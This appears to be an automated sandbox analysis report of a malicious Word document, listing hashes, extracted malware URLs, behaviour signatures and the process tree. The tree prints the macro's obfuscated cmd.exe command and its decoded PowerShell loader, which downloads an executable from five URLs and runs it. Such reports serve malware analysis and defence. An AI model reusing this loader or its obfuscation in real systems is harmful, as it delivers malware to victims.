Analysis
-
max time kernel
110s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
01-07-2022 03:02
Static task
static1
Behavioral task
behavioral1
Sample
d00ea82048586132558cad674d9094f495527202fccddcc84d30b365699839b3.doc
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
d00ea82048586132558cad674d9094f495527202fccddcc84d30b365699839b3.doc
Resource
win10v2004-20220414-en
General
-
Target
d00ea82048586132558cad674d9094f495527202fccddcc84d30b365699839b3.doc
-
Size
102KB
-
MD5
a8663064c108b10da2ff0398fb6f2118
-
SHA1
a15725c07c06c3b04aa4436db05391b6c15b3cc6
-
SHA256
d00ea82048586132558cad674d9094f495527202fccddcc84d30b365699839b3
-
SHA512
63b61b157bc491a8e23eda63f2c5120575e1c2263cfbad38b06806b3bdcbc2916b62e7a861d3917a0a3feceee7fba422c16c4136c5b268587fda2f8c9aa7e467
Malware Config
Extracted
http://intraelectronics.com/9CBQqGip_YBdeLeOmn
http://linkingphase.com/Ye09uJm_1TJzK_0
http://radwomenbusinessowners.com/pnKAX_FAi9jc
http://www.motoruitjes.nl/BrG_4Tb3uEk0N
http://kantova.com/xRVVM3r_gsFZOEnE
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4148 3236 cmd.exe 29 -
Blocklisted process makes network request 5 IoCs
flow pid Process 48 3640 powershell.exe 52 3640 powershell.exe 53 3640 powershell.exe 68 3640 powershell.exe 69 3640 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 3236 WINWORD.EXE 3236 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3640 powershell.exe 3640 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3640 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 3236 WINWORD.EXE 3236 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 3236 WINWORD.EXE 3236 WINWORD.EXE 3236 WINWORD.EXE 3236 WINWORD.EXE 3236 WINWORD.EXE 3236 WINWORD.EXE 3236 WINWORD.EXE -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 3236 wrote to memory of 4240 3236 WINWORD.EXE 80 PID 3236 wrote to memory of 4240 3236 WINWORD.EXE 80 PID 3236 wrote to memory of 4148 3236 WINWORD.EXE 84 PID 3236 wrote to memory of 4148 3236 WINWORD.EXE 84 PID 4148 wrote to memory of 4492 4148 cmd.exe 85 PID 4148 wrote to memory of 4492 4148 cmd.exe 85 PID 4492 wrote to memory of 396 4492 cmd.exe 89 PID 4492 wrote to memory of 396 4492 cmd.exe 89 PID 4492 wrote to memory of 2968 4492 cmd.exe 88 PID 4492 wrote to memory of 2968 4492 cmd.exe 88 PID 2968 wrote to memory of 2744 2968 cmd.exe 87 PID 2968 wrote to memory of 2744 2968 cmd.exe 87 PID 2744 wrote to memory of 1960 2744 cmd.exe 86 PID 2744 wrote to memory of 1960 2744 cmd.exe 86 PID 2744 wrote to memory of 3924 2744 cmd.exe 90 PID 2744 wrote to memory of 3924 2744 cmd.exe 90 PID 2968 wrote to memory of 4108 2968 cmd.exe 91 PID 2968 wrote to memory of 4108 2968 cmd.exe 91 PID 4108 wrote to memory of 3640 4108 cmd.exe 92 PID 4108 wrote to memory of 3640 4108 cmd.exe 92
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d00ea82048586132558cad674d9094f495527202fccddcc84d30b365699839b3.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:4240
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c %ProgrAMData:~0,1%%ProgRAmdATA:~9,2% /V /r "seT eW8=;'kollawerif'=tfetareneg$}}{hctac}};kaerb;'bmBG'=jnsamehcs$;phelbitapmoC$ metI-ekovnI{ )00008 eg- htgnel.)phelbitapmoC$ metI-teG(( fI;'chlanoigeR'=cvgnizylana$;)phelbitapmoC$ ,rnemil$(eliFdaolnwoD.dvtnuoccAnaoLotuA${yrt{)fznedooW$ ni rnemil$(hcaerof;'exe.'+poerihsdrofdeB$+'\'+cilbup:vne$=phelbitapmoC$;'nhecnailla'=izgnisrap$;'338' = poerihsdrofdeB$;'zlPCT'=ojaniloraChtuoS$;)'@'(tilpS.'EnEOZFsg_r3MVVRx/moc.avotnak//:ptth@N0kEu3bT4_GrB/ln.sejtiurotom.www//:ptth@cj9iAF_XAKnp/moc.srenwossenisubnemowdar//:ptth@0_KzJT1_mJu90eY/moc.esahpgniknil//:ptth@nmOeLedBY_piGqQBC9/moc.scinortceleartni//:ptth'=fznedooW$;tneilCbeW.teN tcejbo-wen=dvtnuoccAnaoLotuA$;'mcesiouqrut'=zlaniloraChtroN$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop&& fOr /L %0 IN ( 734 , -1 , 0 ) Do sEt El=!El!!eW8:~ %0, 1!& if %0 lss 1 echO !El:~ 4! | FOR /F "tokens=2 delims=wHF" %p IN ('ftype^^^|findstr mdFi')DO %p "2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4148 -
C:\Windows\system32\cmd.exeCmD /V /r "seT eW8=;'kollawerif'=tfetareneg$}}{hctac}};kaerb;'bmBG'=jnsamehcs$;phelbitapmoC$ metI-ekovnI{ )00008 eg- htgnel.)phelbitapmoC$ metI-teG(( fI;'chlanoigeR'=cvgnizylana$;)phelbitapmoC$ ,rnemil$(eliFdaolnwoD.dvtnuoccAnaoLotuA${yrt{)fznedooW$ ni rnemil$(hcaerof;'exe.'+poerihsdrofdeB$+'\'+cilbup:vne$=phelbitapmoC$;'nhecnailla'=izgnisrap$;'338' = poerihsdrofdeB$;'zlPCT'=ojaniloraChtuoS$;)'@'(tilpS.'EnEOZFsg_r3MVVRx/moc.avotnak//:ptth@N0kEu3bT4_GrB/ln.sejtiurotom.www//:ptth@cj9iAF_XAKnp/moc.srenwossenisubnemowdar//:ptth@0_KzJT1_mJu90eY/moc.esahpgniknil//:ptth@nmOeLedBY_piGqQBC9/moc.scinortceleartni//:ptth'=fznedooW$;tneilCbeW.teN tcejbo-wen=dvtnuoccAnaoLotuA$;'mcesiouqrut'=zlaniloraChtroN$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop&& fOr /L %0 IN ( 734 , -1 , 0 ) Do sEt El=!El!!eW8:~ %0, 1!& if %0 lss 1 echO !El:~ 4! | FOR /F "tokens=2 delims=wHF" %p IN ('ftype^^^|findstr mdFi')DO %p "3⤵
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=2 delims=wHF" %p IN ('ftype^|findstr mdFi') DO %p "4⤵
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Windows\system32\cmd.exeCmd5⤵
- Suspicious use of WriteProcessMemory
PID:4108 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $NorthCarolinalz='turquoisecm';$AutoLoanAccountvd=new-object Net.WebClient;$Woodenzf='http://intraelectronics.com/9CBQqGip_YBdeLeOmn@http://linkingphase.com/Ye09uJm_1TJzK_0@http://radwomenbusinessowners.com/pnKAX_FAi9jc@http://www.motoruitjes.nl/BrG_4Tb3uEk0N@http://kantova.com/xRVVM3r_gsFZOEnE'.Split('@');$SouthCarolinajo='TCPlz';$Bedfordshireop = '833';$parsingzi='alliancehn';$Compatiblehp=$env:public+'\'+$Bedfordshireop+'.exe';foreach($limenr in $Woodenzf){try{$AutoLoanAccountvd.DownloadFile($limenr, $Compatiblehp);$analyzingvc='Regionalhc';If ((Get-Item $Compatiblehp).length -ge 80000) {Invoke-Item $Compatiblehp;$schemasnj='GBmb';break;}}catch{}}$generateft='firewallok';6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3640
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echO pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $NorthCarolinalz='turquoisecm';$AutoLoanAccountvd=new-object Net.WebClient;$Woodenzf='http://intraelectronics.com/9CBQqGip_YBdeLeOmn@http://linkingphase.com/Ye09uJm_1TJzK_0@http://radwomenbusinessowners.com/pnKAX_FAi9jc@http://www.motoruitjes.nl/BrG_4Tb3uEk0N@http://kantova.com/xRVVM3r_gsFZOEnE'.Split('@');$SouthCarolinajo='TCPlz';$Bedfordshireop = '833';$parsingzi='alliancehn';$Compatiblehp=$env:public+'\'+$Bedfordshireop+'.exe';foreach($limenr in $Woodenzf){try{$AutoLoanAccountvd.DownloadFile($limenr, $Compatiblehp);$analyzingvc='Regionalhc';If ((Get-Item $Compatiblehp).length -ge 80000) {Invoke-Item $Compatiblehp;$schemasnj='GBmb';break;}}catch{}}$generateft='firewallok'; "4⤵PID:396
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ftype"1⤵PID:1960
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ftype|findstr mdFi1⤵
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\system32\findstr.exefindstr mdFi2⤵PID:3924
-